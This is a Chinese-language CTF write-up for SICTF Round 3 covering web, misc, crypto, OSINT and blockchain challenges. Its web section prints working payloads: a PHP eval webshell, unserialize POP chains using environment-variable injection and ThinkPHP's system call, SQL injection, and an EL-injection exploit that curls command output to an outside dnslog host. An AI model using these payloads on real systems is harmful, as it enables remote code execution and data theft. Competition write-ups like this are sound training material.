SICTF Round3

WEB

抢到5个一血，一个二血（

100％_upload

观察url，有一个?file=upload.php，猜测这里可以文件包含。

接着是上传文件，过滤了php等关键字，文件名可以随意，上传成功后得到文件路径。

<?=eval($_POST[1])?>

?file=uploads/123.php.png 包含刚刚上传的文件，即可rce。

Not just unserialize

源码：

<?php

highlight_file(__FILE__);
class start
{
    public $welcome;
    public $you;
    public function __destruct()
    {
        $this->begin0fweb();
    }
    public  function begin0fweb()
    {
        $p='hacker!';
        $this->welcome->you = $p;
    }
}

class SE{
    public $year;
    public function __set($name, $value){
        echo '  Welcome to new year!  ';
        echo($this->year);
    }
}

class CR {
    public $last;
    public $newyear;

    public function __tostring() {

        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }

        if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year  ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET{

    public function __isset($name)
    {
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}
if(isset($_REQUEST['go'])){
    unserialize(base64_decode($_REQUEST['go']));
}
?>

可以看到ET::__isset可以环境变量注入rce。

先是pop链：

start::__destruct => SE::__set => CR::__tostring => ET::__isset

<?php

class start
{
    public $welcome;
    public $you;
    public function __destruct()
    {
        $this->begin0fweb();
    }
    public  function begin0fweb()
    {
        $p='hacker!';
        $this->welcome->you = $p;
    }
}

class SE{
    public $year;
    public function __set($name, $value){
        echo '  Welcome to new year!  ';
        echo($this->year);
    }
}

class CR {
    public $last;
    public $newyear="\nworries";

    public function __tostring() {
		echo "__tostring";

        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }

        if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year  ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET{

    public function __isset($name)
    {
		echo "yes";
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}
$a = new start();
$a->welcome=new SE();
$a->welcome->year = new CR();
$a->welcome->year->last = new ET();

echo base64_encode(serialize($a));

// Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX1zOjM6InlvdSI7Tjt9

接着是一些php的特性：

if (is_array($this->newyear)) {
	echo 'nonono';
	return false;
}
if (!preg_match('/worries/i',$this->newyear))
{
	echo "empty it!";
	return 0;
}

if(preg_match('/^.*(worries).*$/',$this->newyear)) {
	echo 'Don\'t be worry';
} else {
	echo 'Worries doesn\'t exists in the new year  ';
	empty($this->last->worries);
}

这里可以用回车来满足正则的要求，即\nworries。

参考链接：preg_match绕过总结

最后是环境变量注入rce。

参考链接：我是如何利用环境变量注入执行任意命令

GET: get[BASH_FUNC_echo%25%25]=()%20{%20cat%20/f*;%20}
POST: go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX1zOjM6InlvdSI7Tjt9

得到flag。

hacker

查看源码可以得到提示

过滤了or，查不了列名，用无列名注入

参考链接：SQL注入之无列名注入

​ buu做题笔记——[网鼎杯 2020 朱雀组]phpweb&[SWPU2019]Web1

前面的查表名库名这些操作可以不用做了，直接套现成的payload查flag表就行了。

username=flag'union/**/select/**/(select/**/group_concat(`2`)/**/from/**/(select/**/1,2/**/union/**/select*from/**/flag)n)%23

EZ_SSRF

用file协议读文件就行了，读/var/www/html/flag.php。（出题人骗我，说flag在/flag）

base64解码得到flag

<?php
$flag = 'SICTF{8ce2ea5d-82b5-4fe0-9d86-efe9a0df693a}';
?>

Oyst3rPHP

thinkphp6.0*的反序列化、preg_match和md5的特性。

首先访问/www.zip，得到源码，看源码的Readme.md知道这是tp6。

部分源码：

public function index()
    {
		echo "RT，一个很简单的Web，给大家送一点分,再送三只生蚝，过年一起吃生蚝哈";
        echo "<img src='../Oyster.png'"."/>";
		
        
		$payload = base64_decode(@$_POST['payload']);
        $right = @$_GET['left'];
        $left = @$_GET['right'];
        
		$key = (string)@$_POST['key'];
        if($right !== $left && md5($right) == md5($left)){
            
			echo "Congratulations on getting your first oyster";
			echo "<img src='../Oyster1.png'"."/>";
            
			if(preg_match('/.+?THINKPHP/is', $key)){
                die("Oysters don't want you to eat");
            }
            if(stripos($key, '603THINKPHP') === false){
                die("！！！Oysters don't want you to eat！！！");
            }
			
			echo "WOW！！！Congratulations on getting your second oyster";
			echo "<img src='../Oyster2.png'"."/>";
            
			@unserialize($payload);
			//最后一个生蚝在根目录，而且里面有Flag？？？咋样去找到它呢？？？它的名字是什么？？？
			//在源码的某处注释给出了提示，这就看你是不是真懂Oyst3rphp框架咯！！！
			//小Tips：细狗函数┗|｀O′|┛ 嗷~~
        }
    }
	

这里先是md5弱比较，然后利用正则回溯最大次数上限绕过 preg_match ，最后是反序列化。

参考链接：利用正则回溯最大次数上限绕过preg_match

反序列化直接拿网上现成的pop链就行了。

<?php
 namespace think\model\concern;
 
 trait Attribute
 {
     private $data = ["key"=>"cat /Oyst3333333r.php"]; // 这里填上命令
     private $withAttr = ["key"=>"system"];
 }
 namespace think;
 abstract class Model
 {
     use model\concern\Attribute;
     private $lazySave = true;
     protected $withEvent = false;
     private $exists = true;
     private $force = true;
     protected $name;
     public function __construct($obj=""){
         $this->name=$obj;
     }
 }
 namespace think\model;
 use think\Model;
 class Pivot extends Model
 {}
 $a=new Pivot();
 $b=new Pivot($a);
 echo base64_encode(serialize($b));
// TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319

因为回溯次数上限默认是 100 万，因此用python写脚本发过去。

import requests

url = "http://yuanshen.life:37255/?left=240610708&right=s878926199a"

data = {"key":'a'*1000100+"603THINKPHP","payload":"TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319"}

r = requests.post(url,data).text

print(r)

成功得到flag。

[进阶]elInjection

题目说明了是elInjection。

先测试，输入${null==null}，发现能原样输出，输入${null1==null}，发现报错了，这里猜测代码能正确执行就会返回输入的值。

参考链接：（先知首发）浅析EL表达式注入漏洞

​ Java EL （Expression Language）表达式注入

因为过滤了invoke，所以不能用反射来绕。

我们可以利用ScriptEngine调用JS引擎绕过，但是后边发现没能执行成功，getRuntime 被过滤了。

通过 charAt 与 toChars 获取字符，在由 toString 转字符串再用 concat 拼接来绕过一些敏感字符的过滤。

dnslog能回显，通过dnslog实现外带

exp:

import requests
import base64

def encode(payload):
	encode_payload = ""
	for i in range(0, len(payload)):
		if i == 0:
			encode_payload += "true.toString().charAt(0).toChars(%d)[0].toString()" % ord(payload[0])
		else:
			encode_payload += ".concat(true.toString().charAt(0).toChars(%d)[0].toString())" % ord(payload[i])
	return encode_payload

# 这里填命令
cmd = b"curl `/readflag`.kbqsag.ceye.io"

#print(base64.b64encode(cmd))

exp = '${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(%s)}' % (encode("java.lang.Runtime.getRuntime().exec(\"bash -c {echo,"+base64.b64encode(cmd).decode()+"}|{base64,-d}|{bash,-i}\")"))
#print(exp)

url = "http://yuanshen.life:23333/test"

data = {'exp': exp}
r = requests.post(url, data).text

print(r)

一开始不知道有/readflag，用grep找根目录有f的文件

cmd = b"curl `ls /|grep 'f'`.kbqsag.ceye.io"

得知有一个readflag，运行它即可得到flag

cmd = b"curl `/readflag`.kbqsag.ceye.io"

把SICTF大写，剩下的小写，补上大括号即可

SICTF{64177ed4-9254-dc2f-8d30-88aaef1b8264}

misc

GeekChallege

猜密码，还不能按字符全猜，得一个一个猜

把出现的字符放在dic前面，加快速度。

import string
import time
from pwn import *

#context.log_level="debug"

p = remote("yuanshen.life",34905)
dic=string.printable
p.recvuntil('>')
pwd = ""
pwdlen = 113
lst=""
for i in range(114):
    print(i,pwd)
    for j in dic:
        payload = pwd + j + '0'*(pwdlen-len(pwd))
        p.sendline(payload)
        a = p.recvuntil('\n').decode()
        if '1'*(len(pwd)+1) in a:
            print(a)
            if j not in lst:
                lst += j
                dic = j + dic
            pwd += j
            break

p.interactive()

真💨签到

zip尾端有一串字符

5456545454565458414259555854585458434152595958415a435959595558563d

hex解码后得到

TVTTTVTXABYUXTXTXCARYYXAZCYYYUXV=

文本加密字母解码，得到压缩包密码。

在线网站：文本加密为字母

2024HappyNewYear

解压后分析音频，降低采样率，可以看到密钥

givemeyourlagrange

最后是音频的文件名：

LagrangeisCapatlized

分离一下：

Lagrange is Capatlized

提示得到的密钥中 Lagrange 要大写。（出题人把 Capatlized写错了-_-!）

最终密钥

givemeyourLAGRANGE

steghide解jpg，即可得到flag。

SICTF{T3e_endless_Lagrange_is_really_fun!}

WHO?WHO?WHO

用rockyou.txt字典爆破压缩包密码，得到密码为qweqwe。

解压后发现字符长度不对，猜测零宽隐写，找个在线网站解了。

网站：zero-width-lib

得到

U2FsdGVkX19uvldJ6CGUNff3B28QEdIjZqgUh98K+/0J16ELU8WVQydohw4P5+2MjbhTLQHNOpcoOd7kSRgy8pwpovCmimdD8M0IbYUeXjNKYePL/WP4PCMaOJHAW3HRb7IEoDDH1NYh3o5NwMmcFEqy1ujf72VgQIQkaeYFFFE=

猜测是rabbit加密，密钥猜是shumu，发现能解。

网站：在线加密解密(采用实现)

得到

GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}

DNA加密，去找个脚本修改一下

网站：DNA-Cipher-Script-CTF

import sys

mapping = {
        'AAA':'a','AAC':'b','AAG':'c','AAT':'d','ACA':'e','ACC':'f', 'ACG':'g','ACT':'h','AGA':'i','AGC':'j','AGG':'k','AGT':'l','ATA':'m','ATC':'n','ATG':'o','ATT':'p','CAA':'q','CAC':'r','CAG':'s','CAT':'t','CCA':'u','CCC':'v','CCG':'w','CCT':'x','CGA':'y','CGC':'z','CGG':'A','CGT':'B','CTA':'C','CTC':'D','CTG':'E','CTT':'F','GAA':'G','GAC':'H','GAG':'I','GAT':'J','GCA':'K','GCC':'L','GCG':'M','GCT':'N','GGA':'O','GGC':'P','GGG':'Q','GGT':'R','GTA':'S','GTC':'T','GTG':'U','GTT':'V','TAA':'W','TAC':'X','TAG':'Y','TAT':'Z','TCA':'1','TCC':'2','TCG':'3','TCT':'4','TGA':'5','TGC':'6','TGG':'7','TGT':'8','TTA':'9','TTC':'0','TTG':' ','TTT':'.'}


def decode_dna(string):
    final=""
    i=0
    while i<len(string):
        final+=mapping[string[i:i+3]]
        i+=3
        if string[i]=='{' or string[i]=='_' or string[i]=='}':
            final+=string[i]
            i+=1
    return final

input_string = "GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}"

flag = decode_dna(input_string)
"""
datas = [input_string.split('{')[0]]+input_string.split('{')[1][:-1].split('_')

flag=''
for i in datas:
    flag+=decode_dna(i)+'_'
    """
print(flag)

# SICTF{Q1A0_Q1A0_GA0_SU_N1_SHUMU_SH1_ZHA_NAN}

日志分析2

ip地址在error.log1里能发现

10.11.35.95

观察access.log.1，在login的时候有大量重复请求发现，应该是在爆破密码

暴力破解

搜索sql，可以看到sqlmap和它的版本号。

sqlmap 1.2.4.18

最后一个是猜用了蚁剑，搜ant，果然是蚁剑，得到名称和版本号

antSword/v2.1

最后的flag：

SICTF{10.11.35.95|暴力破解|sqlmap|1.2.4.18|蚁剑|2.1}

crypto

[签到]Vigenere

在线网站爆破即可

在线网站：Vigenère Solver

SuperbRSA

源码：

#user:mumu666
from Crypto.Util.number import *
p=getPrime(1024)
q=getPrime(1024)
n=p*q
e1=55
e2=200
m=bytes_to_long("flag")
assert(pow(m,5) < n)
c1 = pow(m, e1, n)
c2 = pow(m, e2, n)
print("n=",n)
print("c1=",c1)
print("c2=",c2)

n= 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1= 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2= 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021

共模攻击，解出m后开5次方。

n= 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1= 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2= 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021
e1=55
e2=200
import gmpy2
import libnum
s,s1,s2=gmpy2.gcdext(e1,e2)
m=(pow(c1,s1,n)*pow(c2,s2,n))%n
m = gmpy2.iroot(m,s)[0]
print(libnum.n2s(int(m)).decode())

# SICTF{S0_Great_RSA_Have_Y0u_Learned?}

gggcccddd

源码：

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)

p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537
c1 = pow(m,e,n)
c2 = pow(233*m+9527,e,n)
print(f'n = {n}')
print(f'c1 = {c1}')
print(f'c2 = {c2}')
print(f'e = {e}')
"""
n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
"""

Franklin-Reiter attack，套板子用sage硬跑出来，要等很久。

脚本：

# sage
n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
a = 233
b = 9527

def franklinReiter(n,e,c1,c2,a,b):
    PR.<x> = PolynomialRing(Zmod(n))
    g1 = (x)^e - c1
    g2 = (a*x+b)^e - c2

    def gcd(g1, g2):
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic() # 
    return -gcd(g1, g2)[0]

m=franklinReiter(n,e,c1,c2,a,b)

print(bytes.fromhex(hex(m)[2:]))

# SICTF{45115fb2-84d6-4369-88c2-c8c3d72b4c55}

Forensics

[签到]OSINT签到

百度识图可以看到类似的图片，得到地点为红城湖

SICTF{海南省_海口市_琼山区_红城湖公园}

树木的压迫

把红线部分切下来去百度识图，可以知道这是 达州市体育中心

SICTF{四川省_达州市_通川区_凤凰大道376号_达州市体育中心}

这才是签到

google识图，可以知道这是在 意大利的威尼斯。

接着用谷歌地图找 达涅利酒店附近，可以找到 Gondola Danieli

对着上面图的所有可见地点爆破，可以知道目的地是 Chiesa di San Zaccaria （别学

flag：

SICTF{意大利_威尼斯_GondolaDanieli_ChiesadiSanZaccaria}

真的签到

把摩天轮切下来百度识图，可以找到一个 大信新都汇 旁边的摩天轮。

然后根据 这个视频 可以知道是在 黄杨河边

flag

SICTF{广东省_珠海市_斗门区_大信新都汇}

blockchain

CheckinNewYear

nc连接，常规124，参考链接：【CTF】区块链–合约题入门操作 区块链题型简介 水龙头的对比 remixIDE的基本使用 1——NewStarCTF

源码：

pragma solidity ^0.8.9;

contract HappyNewYear{
    string private NewYear;
    constructor(string memory _newyear )  {
        NewYear = _newyear;
    }
    function happyNewYear(string memory _newYear) public payable {
        
        require(uint160(msg.sender) |
        2**16 * 3**3 * 5 * 7 * 13 * 17 * 19 * 37 * 73 * 97 * 109 * 241 * 257 * 433 * 577 * 673 * 38737 * 487824887233 ==
        2**2 * 17 * 67 * 733 * 316139 * 18992431891 * 72887484710091183279372959
        ,"Not this Year");
        NewYear = _newYear;
    }

       function isSolved() public view returns (bool){
        require(keccak256(abi.encodePacked(NewYear)) == keccak256(abi.encodePacked("Happy")),"not HappyNewYear");
        return true;
    }

}

调用happyNewYear给NewYear赋值为Happy就行了，但在赋值之前会对我们的地址进行检查，要求结尾是0x2024。

那么可以去创建一个后缀是0x2024的虚拟的地址。

参考链接:NewStarCTF Week3 Blockchain

通过 这个网站 可以帮助我们获得指定前缀或者后缀的以太地址账号。

指定后四位为2024，一段时间后得到符合要求的地址，通过私钥导入Metamask

然后把remix上的账户改成新建的账户，先进行chooseone，待交易完成后给happyNewYear传Happy即可。

1里面填上攻击地址，2里面填上要传的值，即Happy，最后isSolved即可。

nc查看3即可得到flag。